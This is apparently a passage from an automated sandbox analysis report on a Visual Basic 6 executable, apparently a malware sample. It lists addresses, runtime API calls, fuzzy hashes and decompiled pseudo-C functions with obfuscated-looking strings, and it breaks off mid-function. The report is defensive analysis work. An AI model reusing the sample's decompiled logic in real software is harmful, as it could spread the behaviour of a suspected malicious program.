          0x00416a9e
          0x00416aaa
          0x00416ac4
          0x00416aac
          0x00416aac
          0x00416ab1
          0x00416ab6
          0x00416abb
          0x00416abb
          0x00416ad0
          0x00416adf
          0x00416ae2
          0x00416ae4
          0x00416aeb
          0x00416b04
          0x00416aed
          0x00416aed
          0x00416aef
          0x00416af4
          0x00416af7
          0x00416afa
          0x00416aff
          0x00416aff
          0x00416b0b
          0x00416b1a
          0x00416b20
          0x00416b22
          0x00416b29
          0x00416b45
          0x00416b2b
          0x00416b2b
          0x00416b30
          0x00416b35
          0x00416b38
          0x00416b3b
          0x00416b40
          0x00416b40
          0x00416b49
          0x00416b4c
          0x00416b4f
          0x00416b59
          0x00416b61
          0x00416b66
          0x00416b89
          0x00416b91
          0x00416b96

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00416A56
          • #541.MSVBVM60(?,7:7:7,?,?,?,?,004016F6), ref: 00416A83
          • __vbaStrVarMove.MSVBVM60(?,?,7:7:7,?,?,?,?,004016F6), ref: 00416A8C
          • __vbaStrMove.MSVBVM60(?,?,7:7:7,?,?,?,?,004016F6), ref: 00416A96
          • __vbaFreeVar.MSVBVM60(?,?,7:7:7,?,?,?,?,004016F6), ref: 00416A9E
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,?,?,7:7:7,?,?,?,?,004016F6), ref: 00416AB6
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000014), ref: 00416AFA
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C4C,000000E0), ref: 00416B3B
          • __vbaStrMove.MSVBVM60(00000000,?,00411C4C,000000E0), ref: 00416B59
          • __vbaFreeObj.MSVBVM60(00000000,?,00411C4C,000000E0), ref: 00416B61
          • __vbaFreeStr.MSVBVM60(00416B97), ref: 00416B89
          • __vbaFreeStr.MSVBVM60(00416B97), ref: 00416B91
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$Free$Move$CheckHresult$#541ChkstkNew2
          • String ID: 7:7:7
          • API String ID: 1992979026-4135912237
          • Opcode ID: de7484df4ffaf3c97750baf78ebbeabad215d5bfff89cf94ef3b3f766c8b1ceb
          • Instruction ID: c9c00dc992880a9df7eb38a18d511c7b4809bacdae20094763e1fe184efa5f6f
          • Opcode Fuzzy Hash: de7484df4ffaf3c97750baf78ebbeabad215d5bfff89cf94ef3b3f766c8b1ceb
          • Instruction Fuzzy Hash: DA41E571D40218AFCB00EFD5C945BDEBBB4AF04744F20842AF505B72A1DB79AA85DB58
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00415CA8, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 79COMMON
          Download Yara Rule
          C-Code - Quality: 50%
          			E00415CA8(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char* _v44;
				intOrPtr _v52;
				intOrPtr _v76;
				intOrPtr _v84;
				short _v104;
				char _v108;
				short _v112;
				short _t30;
				short _t36;
				void* _t47;
				void* _t49;
				intOrPtr _t50;

				_t50 = _t49 - 0xc;
				 *[fs:0x0] = _t50;
				L004016F0();
				_v16 = _t50;
				_v12 = 0x401588;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x60,  *[fs:0x0], 0x4016f6, _t47);
				L004017EC();
				_v108 = 0x98e72e79;
				_push( &_v108);
				_push(L"Bride6");
				_t30 =  &_v36;
				_push(_t30);
				L004018D6();
				_push(_t30);
				E0041165C();
				_v104 = _t30;
				L004018D0();
				asm("sbb eax, eax");
				_v112 =  ~( ~(_v104 - 0x3b15e5) + 1);
				L00401924();
				_t36 = _v112;
				if(_t36 != 0) {
					_v44 = L"Spndingsfelts7";
					_v52 = 8;
					_v76 = 0x98e72e79;
					_v84 = 3;
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t36 = 0x10;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(2);
					_push(L"IyvnZebsGDOjb7EbCSqY69I5dIvuQxd72");
					_push(_v32);
					L004018FA();
				}
				_v28 =  *0x401580;
				asm("wait");
				_push(0x415dac);
				L004018AC();
				return _t36;
			}





















          0x00415cab
          0x00415cba
          0x00415cc4
          0x00415ccc
          0x00415ccf
          0x00415cd6
          0x00415ce5
          0x00415ce8
          0x00415ced
          0x00415cf7
          0x00415cf8
          0x00415cfd
          0x00415d00
          0x00415d01
          0x00415d06
          0x00415d07
          0x00415d0c
          0x00415d10
          0x00415d20
          0x00415d25
          0x00415d2c
          0x00415d31
          0x00415d37
          0x00415d39
          0x00415d40
          0x00415d47
          0x00415d4e
          0x00415d55
          0x00415d58
          0x00415d62
          0x00415d63
          0x00415d64
          0x00415d65
          0x00415d68
          0x00415d69
          0x00415d73
          0x00415d74
          0x00415d75
          0x00415d76
          0x00415d77
          0x00415d79
          0x00415d7e
          0x00415d81
          0x00415d86
          0x00415d8f
          0x00415d92
          0x00415d93
          0x00415da6
          0x00415dab

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00415CC4
          • #598.MSVBVM60(?,?,?,?,004016F6), ref: 00415CE8
          • __vbaStrToAnsi.MSVBVM60(?,Bride6,98E72E79), ref: 00415D01
          • __vbaSetSystemError.MSVBVM60(00000000,?,Bride6,98E72E79), ref: 00415D10
          • __vbaFreeStr.MSVBVM60(00000000,?,Bride6,98E72E79), ref: 00415D2C
          • __vbaChkstk.MSVBVM60(00000000,?,Bride6,98E72E79), ref: 00415D58
          • __vbaChkstk.MSVBVM60(00000000,?,Bride6,98E72E79), ref: 00415D69
          • __vbaLateMemCall.MSVBVM60(?,IyvnZebsGDOjb7EbCSqY69I5dIvuQxd72,00000002,00000000,?,Bride6,98E72E79), ref: 00415D81
          • __vbaFreeObj.MSVBVM60(00415DAC,00000000,?,Bride6,98E72E79), ref: 00415DA6
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$Chkstk$Free$#598AnsiCallErrorLateSystem
          • String ID: Bride6$IyvnZebsGDOjb7EbCSqY69I5dIvuQxd72$Spndingsfelts7
          • API String ID: 3513344361-1204764921
          • Opcode ID: 9ba6eea4e6b2834c71ed4180316dee29934da15a35bf6c83fd68888bee7f1252
          • Instruction ID: 37e1e018f3d670cf2255f87ce6307905a9e0e99f1db659018bbe8b416997140d
          • Opcode Fuzzy Hash: 9ba6eea4e6b2834c71ed4180316dee29934da15a35bf6c83fd68888bee7f1252
          • Instruction Fuzzy Hash: C3218D71C40308ABCB00EFA5DC46BDEBBB9AF05704F50842AF804BB1A1D7B99545CB48
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00416246, Relevance: 19.6, APIs: 13, Instructions: 110COMMON
          Download Yara Rule
          C-Code - Quality: 53%
          			E00416246(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed int _v52;
				signed int _v60;
				intOrPtr* _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _t59;
				signed int _t64;
				signed int _t65;
				intOrPtr _t81;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t81;
				_push(0x38);
				L004016F0();
				_v12 = _t81;
				_v8 = 0x4015c8;
				L004018F4();
				if( *0x4183d8 != 0) {
					_v64 = 0x4183d8;
				} else {
					_push(0x4183d8);
					_push(0x411ae0);
					L004018C4();
					_v64 = 0x4183d8;
				}
				_v40 =  *_v64;
				_t59 =  *((intOrPtr*)( *_v40 + 0x14))(_v40,  &_v36);
				asm("fclex");
				_v44 = _t59;
				if(_v44 >= 0) {
					_v68 = _v68 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x411ad0);
					_push(_v40);
					_push(_v44);
					L00401906();
					_v68 = _t59;
				}
				_v48 = _v36;
				_t64 =  *((intOrPtr*)( *_v48 + 0xd8))(_v48,  &_v32);
				asm("fclex");
				_v52 = _t64;
				if(_v52 >= 0) {
					_v72 = _v72 & 0x00000000;
				} else {
					_push(0xd8);
					_push(0x411c4c);
					_push(_v48);
					_push(_v52);
					L00401906();
					_v72 = _t64;
				}
				_t65 = _v32;
				_v60 = _t65;
				_t35 =  &_v32;
				 *_t35 = _v32 & 0x00000000;
				L00401882();
				L004018AC();
				L004017C8();
				L0040193C();
				asm("fcomp qword [0x401548]");
				asm("fnstsw ax");
				asm("sahf");
				if( *_t35 != 0) {
					L0040183A();
					_t65 =  *((intOrPtr*)( *_a4 + 0x64))(_a4, _t65);
					asm("fclex");
					_v40 = _t65;
					if(_v40 >= 0) {
						_v76 = _v76 & 0x00000000;
					} else {
						_push(0x64);
						_push(0x4105b8);
						_push(_a4);
						_push(_v40);
						L00401906();
						_v76 = _t65;
					}
				}
				asm("wait");
				_push(0x4163c3);
				L00401924();
				L00401924();
				return _t65;
			}






















          0x0041624b
          0x00416256
          0x00416257
          0x0041625e
          0x00416261
          0x00416269
          0x0041626c
          0x00416279
          0x00416285
          0x0041629f
          0x00416287
          0x00416287
          0x0041628c
          0x00416291
          0x00416296
          0x00416296
          0x004162ab
          0x004162ba
          0x004162bd
          0x004162bf
          0x004162c6
          0x004162df
          0x004162c8
          0x004162c8
          0x004162ca
          0x004162cf
          0x004162d2
          0x004162d5
          0x004162da
          0x004162da
          0x004162e6
          0x004162f5
          0x004162fb
          0x004162fd
          0x00416304
          0x00416320
          0x00416306
          0x00416306
          0x0041630b
          0x00416310
          0x00416313
          0x00416316
          0x0041631b
          0x0041631b
          0x00416324
          0x00416327
          0x0041632a
          0x0041632a
          0x00416334
          0x0041633c
          0x00416347
          0x0041634c
          0x00416351
          0x00416357
          0x00416359
          0x0041635a
          0x00416362
          0x00416370
          0x00416373
          0x00416375
          0x0041637c
          0x00416395
          0x0041637e
          0x0041637e
          0x00416380
          0x00416385
          0x00416388
          0x0041638b
          0x00416390
          0x00416390
          0x0041637c
          0x00416399
          0x0041639a
          0x004163b5
          0x004163bd
          0x004163c2

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00416261
          • __vbaStrCopy.MSVBVM60(?,?,?,?,004016F6), ref: 00416279
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,?,?,?,?,004016F6), ref: 00416291
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000014), ref: 004162D5
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C4C,000000D8), ref: 00416316
          • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00416334
          • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 0041633C
          • __vbaFPInt.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00416347
          • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 0041634C
          • __vbaFpI4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00416362
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105B8,00000064), ref: 0041638B
          • __vbaFreeStr.MSVBVM60(004163C3,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 004163B5
          • __vbaFreeStr.MSVBVM60(004163C3,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 004163BD
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$CheckFreeHresult$ChkstkCopyMoveNew2
          • String ID:
          • API String ID: 1785689987-0
          • Opcode ID: 2fc8871b209d589d8366b269a288114d3180436723d24f16c0d5e0c04949552e
          • Instruction ID: b236f01e2bd691bf364bd193a634995bbb0f4ceea69fe1c2efd4085c16b25e2e
          • Opcode Fuzzy Hash: 2fc8871b209d589d8366b269a288114d3180436723d24f16c0d5e0c04949552e
          • Instruction Fuzzy Hash: A141E27190020DEFCB00EF95C945BDEBBB4FF08745F10806AF415B62A0DB79A985DB68
          Uniqueness

          Uniqueness Score: -1.00%

          Function 004154CB, Relevance: 18.1, APIs: 12, Instructions: 120COMMON
          Download Yara Rule
          C-Code - Quality: 52%
          			E004154CB(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v32;
				signed int _v36;
				void* _v40;
				char _v56;
				char _v72;
				intOrPtr _v96;
				intOrPtr _v104;
				intOrPtr _v112;
				char _v120;
				void* _v124;
				signed int _v128;
				intOrPtr* _v132;
				signed int _v136;
				intOrPtr _v144;
				intOrPtr* _v148;
				signed int _v152;
				signed int _v156;
				short _t63;
				signed int _t66;
				signed int _t72;
				signed int _t78;
				intOrPtr _t93;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t93;
				L004016F0();
				_v12 = _t93;
				_v8 = 0x401530;
				_v96 = 0x411a30;
				_v104 = 8;
				L004018A0();
				_push(0);
				_push(3);
				_push( &_v56);
				_push( &_v72);
				L00401810();
				_v112 = 0x411cf4;
				_v120 = 0x8008;
				_push( &_v72);
				_t63 =  &_v120;
				_push(_t63);
				L00401828();
				_v124 = _t63;
				_push( &_v72);
				_push( &_v56);
				_push(2);
				L00401942();
				_t66 = _v124;
				if(_t66 != 0) {
					if( *0x4183d8 != 0) {
						_v148 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x411ae0);
						L004018C4();
						_v148 = 0x4183d8;
					}
					_v124 =  *_v148;
					_t72 =  *((intOrPtr*)( *_v124 + 0x1c))(_v124,  &_v40);
					asm("fclex");
					_v128 = _t72;
					if(_v128 >= 0) {
						_v152 = _v152 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x411ad0);
						_push(_v124);
						_push(_v128);
						L00401906();
						_v152 = _t72;
					}
					_v132 = _v40;
					_v96 = 0x80020004;
					_v104 = 0xa;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t78 =  *((intOrPtr*)( *_v132 + 0x5c))(_v132, 0x10,  &_v36);
					asm("fclex");
					_v136 = _t78;
					if(_v136 >= 0) {
						_v156 = _v156 & 0x00000000;
					} else {
						_push(0x5c);
						_push(0x411c24);
						_push(_v132);
						_push(_v136);
						L00401906();
						_v156 = _t78;
					}
					_t66 = _v36;
					_v144 = _t66;
					_v36 = _v36 & 0x00000000;
					L00401882();
					L004018AC();
				}
				_v28 = 0x190d6de0;
				_v24 = 0x5b03;
				_push(0x4156a6);
				L00401924();
				return _t66;
			}





























          0x004154d0
          0x004154db
          0x004154dc
          0x004154e8
          0x004154f0
          0x004154f3
          0x004154fa
          0x00415501
          0x0041550e
          0x00415513
          0x00415515
          0x0041551a
          0x0041551e
          0x0041551f
          0x00415524
          0x0041552b
          0x00415535
          0x00415536
          0x00415539
          0x0041553a
          0x0041553f
          0x00415546
          0x0041554a
          0x0041554b
          0x0041554d
          0x00415555
          0x0041555b
          0x00415568
          0x00415585
          0x0041556a
          0x0041556a
          0x0041556f
          0x00415574
          0x00415579
          0x00415579
          0x00415597
          0x004155a6
          0x004155a9
          0x004155ab
          0x004155b2
          0x004155ce
          0x004155b4
          0x004155b4
          0x004155b6
          0x004155bb
          0x004155be
          0x004155c1
          0x004155c6
          0x004155c6
          0x004155d8
          0x004155db
          0x004155e2
          0x004155f0
          0x004155fa
          0x004155fb
          0x004155fc
          0x004155fd
          0x00415606
          0x00415609
          0x0041560b
          0x00415618
          0x00415637
          0x0041561a
          0x0041561a
          0x0041561c
          0x00415621
          0x00415624
          0x0041562a
          0x0041562f
          0x0041562f
          0x0041563e
          0x00415641
          0x00415647
          0x00415654
          0x0041565c
          0x0041565c
          0x00415661
          0x00415668
          0x0041566f
          0x004156a0
          0x004156a5

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 004154E8
          • __vbaVarDup.MSVBVM60 ref: 0041550E
          • #717.MSVBVM60(?,?,00000003,00000000), ref: 0041551F
          • __vbaVarTstNe.MSVBVM60(00008008,?,?,?,00000003,00000000), ref: 0041553A
          • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008008,?,?,?,00000003,00000000), ref: 0041554D
          • __vbaNew2.MSVBVM60(00411AE0,004183D8), ref: 00415574
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,0000001C), ref: 004155C1
          • __vbaChkstk.MSVBVM60(?), ref: 004155F0
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C24,0000005C), ref: 0041562A
          • __vbaStrMove.MSVBVM60(00000000,?,00411C24,0000005C), ref: 00415654
          • __vbaFreeObj.MSVBVM60(00000000,?,00411C24,0000005C), ref: 0041565C
          • __vbaFreeStr.MSVBVM60(004156A6), ref: 004156A0
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$Free$CheckChkstkHresult$#717ListMoveNew2
          • String ID:
          • API String ID: 2511207350-0
          • Opcode ID: 08eef1e3f561d2784ab6a101676d5636d41c4aca24520e826ab253df782c6ced
          • Instruction ID: 08de49b328e945ae8d3490b2afcec97a2dd222b8e44cc5443b5d52720f088425
          • Opcode Fuzzy Hash: 08eef1e3f561d2784ab6a101676d5636d41c4aca24520e826ab253df782c6ced
          • Instruction Fuzzy Hash: A6510571D00608EFDB10DFA1C945BDEBBB9BF04704F60446AE109B72A1DB796A85CF58
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0041514B, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81COMMON
          Download Yara Rule
          C-Code - Quality: 55%
          			E0041514B(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, char __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				intOrPtr _v32;
				char _v40;
				char _v48;
				char _v56;
				char* _v64;
				char _v72;
				short _v92;
				signed int _v100;
				char* _t33;
				intOrPtr _t46;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t46;
				_push(0x50);
				L004016F0();
				_v12 = _t46;
				_v8 = 0x401510;
				_v48 = 0x80020004;
				_v56 = 0xa;
				_v32 = 0x80020004;
				_v40 = 0xa;
				_push( &_v56);
				_push( &_v40);
				asm("fld1");
				_v48 = __fp0;
				asm("fld1");
				_v56 = __fp0;
				asm("fld1");
				_v64 = __fp0;
				asm("fld1");
				_v72 = __fp0;
				L0040181C();
				L0040193C();
				asm("fcomp qword [0x401508]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags == 0) {
					_t10 =  &_v100;
					 *_t10 = _v100 & 0x00000000;
					__eflags =  *_t10;
				} else {
					_v100 = 1;
				}
				_v92 =  ~_v100;
				_push( &_v56);
				_push( &_v40);
				_push(2);
				L00401942();
				_t33 = _v92;
				if(_t33 != 0) {
					_v64 = L"samtaleemnetsrhes";
					_v72 = 8;
					L004018A0();
					_t33 =  &_v40;
					_push(_t33);
					L00401816();
					L00401882();
					L00401912();
				}
				asm("wait");
				_push(0x415255);
				L00401924();
				return _t33;
			}
















          0x00415150
          0x0041515b
          0x0041515c
          0x00415163
          0x00415166
          0x0041516e
          0x00415171
          0x00415178
          0x0041517f
          0x00415186
          0x0041518d
          0x00415197
          0x0041519b
          0x0041519c
          0x004151a0
          0x004151a3
          0x004151a7
          0x004151aa
          0x004151ae
          0x004151b1
          0x004151b5
          0x004151b8
          0x004151bd
          0x004151c2
          0x004151c8
          0x004151ca
          0x004151cb
          0x004151d6
          0x004151d6
          0x004151d6
          0x004151cd
          0x004151cd
          0x004151cd
          0x004151df
          0x004151e6
          0x004151ea
          0x004151eb
          0x004151ed
          0x004151f5
          0x004151fb
          0x004151fd
          0x00415204
          0x00415211
          0x00415216
          0x00415219
          0x0041521a
          0x00415224
          0x0041522c
          0x0041522c
          0x00415231
          0x00415232
          0x0041524f
          0x00415254

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00415166
          • #675.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 004151B8
          • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 004151BD
          • __vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A,?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 004151ED
          • __vbaVarDup.MSVBVM60 ref: 00415211
          • #667.MSVBVM60(?), ref: 0041521A
          • __vbaStrMove.MSVBVM60(?), ref: 00415224
          • __vbaFreeVar.MSVBVM60(?), ref: 0041522C
          • __vbaFreeStr.MSVBVM60(00415255), ref: 0041524F
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$Free$#667#675ChkstkListMove
          • String ID: samtaleemnetsrhes
          • API String ID: 724837296-85822442
          • Opcode ID: d09b37817b375a3d28831260fac72c9294a75755242a387248ff56af937698f5
          • Instruction ID: 7a57f5c3cb573f693e407fb6fb6044a0ee640fe84f5ae75538ad6d7179837b27
          • Opcode Fuzzy Hash: d09b37817b375a3d28831260fac72c9294a75755242a387248ff56af937698f5
          • Instruction Fuzzy Hash: 3C2162B1800608EBDB05EF91CD46BEEB7B9EF44704F60456EF00176190DBB95E44CB69
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00414CF3, Relevance: 15.1, APIs: 10, Instructions: 96COMMON
          Download Yara Rule
          C-Code - Quality: 56%
          			E00414CF3(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				long long _v32;
				short _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				signed int _v56;
				intOrPtr* _v60;
				signed int _v64;
				intOrPtr* _v72;
				signed int _v76;
				signed int _v80;
				signed int _t41;
				short _t45;
				signed int _t51;
				signed int _t56;
				intOrPtr _t67;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t67;
				_t41 = 0x3c;
				L004016F0();
				_v12 = _t67;
				_v8 = 0x4014b8;
				L00401852();
				_v24 = __fp0;
				_push(0x411c18);
				L00401846();
				L00401882();
				_push(_t41);
				_push(0x411c20);
				L0040184C();
				asm("sbb eax, eax");
				_v52 =  ~( ~( ~_t41));
				L00401924();
				_t45 = _v52;
				if(_t45 != 0) {
					if( *0x4183d8 != 0) {
						_v72 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x411ae0);
						L004018C4();
						_v72 = 0x4183d8;
					}
					_v52 =  *_v72;
					_t51 =  *((intOrPtr*)( *_v52 + 0x1c))(_v52,  &_v44);
					asm("fclex");
					_v56 = _t51;
					if(_v56 >= 0) {
						_v76 = _v76 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x411ad0);
						_push(_v52);
						_push(_v56);
						L00401906();
						_v76 = _t51;
					}
					_v60 = _v44;
					_t56 =  *((intOrPtr*)( *_v60 + 0x64))(_v60, 1,  &_v48);
					asm("fclex");
					_v64 = _t56;
					if(_v64 >= 0) {
						_v80 = _v80 & 0x00000000;
					} else {
						_push(0x64);
						_push(0x411c24);
						_push(_v60);
						_push(_v64);
						L00401906();
						_v80 = _t56;
					}
					_t45 = _v48;
					_v36 = _t45;
					L004018AC();
				}
				_v32 =  *0x4014b0;
				asm("wait");
				_push(0x414e3c);
				return _t45;
			}























          0x00414cf8
          0x00414d03
          0x00414d04
          0x00414d0d
          0x00414d0e
          0x00414d16
          0x00414d19
          0x00414d20
          0x00414d25
          0x00414d28
          0x00414d2d
          0x00414d37
          0x00414d3c
          0x00414d3d
          0x00414d42
          0x00414d49
          0x00414d4f
          0x00414d56
          0x00414d5b
          0x00414d61
          0x00414d6e
          0x00414d88
          0x00414d70
          0x00414d70
          0x00414d75
          0x00414d7a
          0x00414d7f
          0x00414d7f
          0x00414d94
          0x00414da3
          0x00414da6
          0x00414da8
          0x00414daf
          0x00414dc8
          0x00414db1
          0x00414db1
          0x00414db3
          0x00414db8
          0x00414dbb
          0x00414dbe
          0x00414dc3
          0x00414dc3
          0x00414dcf
          0x00414de0
          0x00414de3
          0x00414de5
          0x00414dec
          0x00414e05
          0x00414dee
          0x00414dee
          0x00414df0
          0x00414df5
          0x00414df8
          0x00414dfb
          0x00414e00
          0x00414e00
          0x00414e09
          0x00414e0d
          0x00414e14
          0x00414e14
          0x00414e1f
          0x00414e22
          0x00414e23
          0x00000000

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00414D0E
          • #535.MSVBVM60(?,?,?,?,004016F6), ref: 00414D20
          • #527.MSVBVM60(00411C18,?,?,?,?,004016F6), ref: 00414D2D
          • __vbaStrMove.MSVBVM60(00411C18,?,?,?,?,004016F6), ref: 00414D37
          • __vbaStrCmp.MSVBVM60(00411C20,00000000,00411C18,?,?,?,?,004016F6), ref: 00414D42
          • __vbaFreeStr.MSVBVM60(00411C20,00000000,00411C18,?,?,?,?,004016F6), ref: 00414D56
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,00411C20,00000000,00411C18,?,?,?,?,004016F6), ref: 00414D7A
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,0000001C,?,?,?,?,?,?,?,00411C20,00000000,00411C18), ref: 00414DBE
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C24,00000064,?,?,?,?,?,?,?,00411C20,00000000,00411C18), ref: 00414DFB
          • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00411C20,00000000,00411C18), ref: 00414E14
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$CheckFreeHresult$#527#535ChkstkMoveNew2
          • String ID:
          • API String ID: 2200900967-0
          • Opcode ID: 9a838a82cc72fc940b8cbb677598d1c015845ffd13af8d501d29da7b618deeae
          • Instruction ID: eaf7ab0030bc6f1eb20f90d7ca5afba79f33fe57757848bbb720ed7c03e5ac0a
          • Opcode Fuzzy Hash: 9a838a82cc72fc940b8cbb677598d1c015845ffd13af8d501d29da7b618deeae
          • Instruction Fuzzy Hash: 59311571940208EFCF01EB95D985BEEBBB4BF08B04F10452AF501B62A0DB795984CB59
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00414A7A, Relevance: 15.1, APIs: 10, Instructions: 96COMMON
          Download Yara Rule
          C-Code - Quality: 41%
          			E00414A7A(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v40;
				char _v44;
				char _v60;
				signed int _v80;
				signed int _v84;
				signed int _v96;
				intOrPtr* _v100;
				signed int _v104;
				char* _t48;
				signed int _t49;
				char* _t52;
				char* _t53;
				signed int _t58;
				void* _t68;
				void* _t70;
				intOrPtr _t71;

				_t71 = _t70 - 0xc;
				 *[fs:0x0] = _t71;
				L004016F0();
				_v16 = _t71;
				_v12 = 0x401488;
				_v8 = 0;
